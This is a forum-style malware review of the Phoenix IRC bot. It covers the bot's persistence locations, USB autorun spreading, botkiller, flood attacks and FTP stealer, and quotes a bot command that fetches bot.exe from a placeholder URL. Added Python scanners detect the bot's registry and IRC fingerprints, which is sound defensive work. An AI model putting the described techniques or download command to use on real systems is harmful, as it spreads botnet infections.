FenniC

Untitled

Jun 1st, 2011
Notice: The following statements are opinions and are to be treated as such.

I’ve wanted to analyze this bot for a while, as the coder (Avenge) always boasts about his extensive knowledge of “C/C++”, so I expected a high-quality primo bot. After obtaining/studying the bot, the word “disappointed” pretty well sums it up. However, this bot is still one of the best IRC bots Hackforums.net has to offer.


1). UNICODE Support

I recall Avenge posting in threads saying that “UNICODE Support” is basically #defining UNICODE in a header and using “UNICODE APIs” like wchar_t, RegSetKeyExW, etc. (the W actually stands for WideChar). Now I was assuming Avenge would also have made his application a UNICODE build, which would have validated his claim of UNICODE support. However, since he did not make his application a UNICODE build, it did not matter whether he used just wide chars and wide char functions; they’re all ANSI regardless. The picture below supports my claim (Critical Core is Phoenix Bot):

[Screenshot: Startup Test vs. Critical Core (Phoenix Bot)]

Note: The Startup Test is my application; you can get the code here (True UNICODE FTW):
Code:
http://www.hackforums.net/showthread.php?tid=1271790

So, Phoenix IRC Bot does NOT have proper UNICODE Support.


2). Runs as a critical system process?

After running the bot (on my Windows XP machine), the file melts to two locations:

%APPDATA%\winlogon.exe (This file is run at startup, has an HKLM and HKCU entry, and acts as a “loader”.)
%ALLUSERSAPPDATA%\syshost.exe (This is the running bot, executed by winlogon, and has no registry entries.)

If the registry values (HKCU or HKLM) were deleted or altered it would fix the key, so it does have registry persistence. However, if I modified either of the filenames or deleted the winlogon file, it would not restore either filename/remelt. I was able to kill the syshost.exe process in Task Manager and delete both files and the registry keys. If the bot was running as a system/critical process, I would not have been able to kill the syshost process in the first place.

Note: I did not send the !file.guard command or execute the !status command via IRC; the bot was just running normally.
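As an added example (not from the original post), here is a Python triage routine that applies the persistence finding above to Run-key entries: it flags a Windows system binary name such as winlogon.exe pointing outside System32, autorun targets under user-writable profile paths, and the same target registered under both HKLM and HKCU. The entries, value names, environment paths and the list of System32-only names are constructed assumptions.

```python
import ntpath

# Binaries that legitimately live only under %SystemRoot%\System32 (assumed list).
SYSTEM_ONLY_NAMES = {"winlogon.exe", "csrss.exe", "lsass.exe", "services.exe"}
# User-writable roots on XP and later, compared in lower case.
USER_WRITABLE_ROOTS = (
    "c:\\documents and settings\\",
    "c:\\users\\",
    "c:\\windows\\temp\\",
)

def expand(path, env):
    """Expand %VAR% references with the supplied mapping (not the live environment)."""
    for name, value in env.items():
        path = path.replace("%" + name + "%", value)
    return path

def triage_run_entries(entries, env):
    """entries: (hive, value_name, data) from Run keys. Returns (findings, dual_hive_targets)."""
    findings, hives_by_target = [], {}
    for hive, value_name, data in entries:
        target = expand(data.strip('"'), env).lower()
        reasons = []
        base = ntpath.basename(target)
        if base in SYSTEM_ONLY_NAMES and not target.startswith("c:\\windows\\system32\\"):
            reasons.append("system binary name outside System32")
        if target.startswith(USER_WRITABLE_ROOTS):
            reasons.append("autorun target in a user-writable profile directory")
        hives_by_target.setdefault(target, set()).add(hive)
        if reasons:
            findings.append((hive, value_name, target, reasons))
    # The loader described above registers itself under both HKLM and HKCU.
    dual = {t for t, hives in hives_by_target.items() if {"HKLM", "HKCU"} <= hives}
    return findings, dual

# Constructed sample: an XP profile layout, two loader entries and one benign entry.
CONSTRUCTED_ENV = {
    "APPDATA": r"C:\Documents and Settings\user\Application Data",
    "SystemRoot": r"C:\WINDOWS",
}
CONSTRUCTED_ENTRIES = [
    ("HKLM", "winlogon", r"%APPDATA%\winlogon.exe"),
    ("HKCU", "winlogon", r"%APPDATA%\winlogon.exe"),
    ("HKLM", "ctfmon", r"%SystemRoot%\system32\ctfmon.exe"),
]

if __name__ == "__main__":
    for finding in triage_run_entries(CONSTRUCTED_ENTRIES, CONSTRUCTED_ENV)[0]:
        print(finding)
```

On a live host the entries would come from the HKLM and HKCU Run keys (for example via winreg) and the mapping from the victim profile's actual paths.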


3). Server information is encrypted

I dumped the process memory and received a treasure trove of information, which included: IRC server, authhost, #channel, password, and the whole kitchen sink. Here’s the hex (I didn’t realign headers/fix the file size, and I don’t believe the bot will work even if you do so. I also removed/altered the info to protect the owner). Funny how the string “[Critical]: Running as critical system process” is in the dump; maybe there's a command to activate it (doubt it though). There is, however, a !visit command that launches a URL in a hidden iexplore.exe.

Code:
http://pastebin.com/jWuaDPpg


4). Signs of Aspergillus base

Nowhere in the sales thread did I see this bot claimed to be “coded from scratch”, so this is completely allowed. It’s actually kinda pointless to code an IRC bot completely from scratch when all methods of utilizing winsock/parsing IRC lines have already been publicized. It does, however, make Avenge a huge hypocrite, since he runs around flaming everyone else for using it in their bots.

I). When the bot first connects, this data is sent for the USER info:

USER <random string> "" "lol" :<same random string>

This is the exact same method Aspergillus uses, not only because of the matching random strings for username and full username, the random string lengths, and the unique trademark “lol” for the host, but also because you don’t even need to send the quotation marks. If it were not Aspergillus, I believe a custom method would have been implemented.

II). If you kick the bot from your channel, the bot does not rejoin.

III). If you look at the memory dump, you will see all the constants (NICK....JOIN....PART....QUIT....PASS....PING....PONG....USER....PRIVMSG) together, just like in Aspergillus.

IV). Executes commands from the IRC channel topic.

V). I think it’s pretty safe to assume it also uses Aspergillus’s checkhost, since it doesn’t require a username/nick.

VI). If you look in the memory dump you will see the good old .bat delete for uninstall, with ping used to sleep since you can’t sleep in batch. The script continued even after the bot was deleted, gave an error at shutdown, and brought my machine to a crawl.
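As an added example (not the bot's or Aspergillus's code), here is a Python scan over a captured IRC session that flags the two network-visible traits from I) and IV) above: the USER registration fingerprint with the literal "" and "lol" fields and matching username/realname, and commands delivered through the channel topic (a TOPIC message or the 332 topic reply). The capture lines, nicks and server name are constructed; the !file.guard topic uses the placeholder URL from the post.

```python
def parse_irc_line(line):
    """Split one raw IRC line into (prefix, command, params, trailing); None if empty."""
    line = line.rstrip("\r\n")
    prefix = None
    if line.startswith(":"):
        prefix, _, line = line[1:].partition(" ")
    head, sep, trailing = line.partition(" :")
    parts = head.split()
    if not parts:
        return None
    return prefix, parts[0].upper(), parts[1:], (trailing if sep else None)

def is_aspergillus_user_line(cmd, params, trailing):
    """USER <x> "" "lol" :<x> -- quoted mode/unused fields sent literally, realname == username."""
    return (cmd == "USER" and len(params) >= 3
            and params[1] == '""' and params[2] == '"lol"'
            and trailing is not None and trailing == params[0])

def topic_command(cmd, trailing):
    """Return the command verb when a topic (TOPIC or numeric 332) starts with '!'."""
    if cmd in ("TOPIC", "332") and trailing and trailing.startswith("!"):
        return trailing.split()[0]
    return None

def scan_irc_capture(lines):
    alerts = []
    for raw in lines:
        parsed = parse_irc_line(raw)
        if parsed is None:
            continue
        _, cmd, params, trailing = parsed
        if is_aspergillus_user_line(cmd, params, trailing):
            alerts.append(("aspergillus-user-fingerprint", raw.strip()))
        verb = topic_command(cmd, trailing)
        if verb:
            alerts.append(("topic-command", verb))
    return alerts

# Constructed capture: one ordinary client, one bot-style registration, two topics.
CONSTRUCTED_CAPTURE = [
    "USER alice 0 * :Alice Example\r\n",
    'USER qhz83k "" "lol" :qhz83k\r\n',
    ":irc.example.net 332 qhz83k #chan :!file.guard http://www.url.com/bot.exe\r\n",
    ":irc.example.net 332 alice #help :Welcome, read the FAQ first\r\n",
    ":ops!ops@host TOPIC #chan :!visit http://www.url.com/\r\n",
]

if __name__ == "__main__":
    for alert in scan_irc_capture(CONSTRUCTED_CAPTURE): print(alert)
```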


5). USB Spread

The autorun.inf method is exactly the same as the public one (the only difference is it uses device notifications; an example is on MSDN). The shortcuts are only added if it detects a “.docx” file. The downside of the shortcuts is that the drive letter is static. So say, for example, you infected drive D on one computer. When they place the USB drive into another computer and it’s drive E, the shortcuts will not work. Here are all the file contents:

Code:
http://pastebin.com/5vyMpzRK

The USB-Recovery-Tool.exe is the bot and both shortcuts execute the hidden winlogon (bot) file, just FYI.


6). File Guard

This only works if the winlogon.exe file is renamed/deleted and there’s a pause. If, for example, I drag a blank winlogon.exe into the %APPDATA% folder and overwrite the existing “loader” winlogon.exe, the guard does not detect the change. Also, if you kill syshost.exe, the guard fails. Another downside is you have to activate this feature yourself, which means if you don’t set the channel topic to !file.guard http://www.url.com/bot.exe, the guard will not work when the computer restarts. I would have thought this would have used a remote thread, but I guess it doesn't.


7). Sort bots via country, bot version, and dependencies

The country, version, and Java dependency checks work, but on my Windows XP machine it was unable to detect that it had the .NET framework. Very minor bug, but if it's giving inaccurate results, it makes this function obsolete. The irony of this is that the bot was crypted with a VB.NET crypter.


8). BotKiller

The botkiller doesn't work in Sandboxie (or on a normal user account, I would assume), but it did work on my Windows XP machine, Admin account (not sure about Windows Vista/7). There is a major problem though: it only works ONE time (every time after, it didn’t do anything). All it killed was the system process/program ctfmon.exe in the %WINDOWS% folder; I recall reading it would only kill programs in the %APPDATA% or %TEMP% folder, but I guess not. It also didn’t touch the HKLM files, not to mention the method it uses, system(“taskkill /f /IM %s”), displays a DOS CMD console for a split second. I remember Avenge laughing at other members for using this method, but look who’s using it now.

Note: Since Phoenix doesn't run as a critical process, I was able to kill syshost.exe using Ganja’s botkiller (unmodified).


9). HTTP and SYN Floods

I ran a local webserver and did not receive a single GET request when I was running the HTTP flood. The SYN flood is nothing more than a TCP connect/disconnect attack, as shown in my webserver logs (it didn't even appear to be multisocket). Can’t really say much about the UDP flood, but I’m sure it works (maybe). Also, the dos.stop did not stop the flood.


10). Conclusion

In closing, the download/update commands do work (except on the UNICODE accounts), the FTP stealer works, as well as the other commands. I could probably find more flaws with this bot; however, it’s pointless to continue the analysis as I never had any intention of using it. This just goes to show you, no one on this board is capable/intelligent enough to properly evaluate a product/know how it's supposed to function. Believe what you want about this bot; however, sooner or later (I hope) you will realize that the Hackforums.net marketplace does not have either reputable sellers or products, for that matter. Eventually you will find this out IRL when you go to (what seems like) a reputable car dealer and buy a car, only to discover down the road how much of a POS it is. I don't question Avenge's ability to code, but let it be clear he couldn't care less about his Hackforums.net clients, as he was only in it for the money and supplied a subpar product. Remember the only person you can trust is yourself; don't fall slave to others' stupidity/ignorance/inadequacies.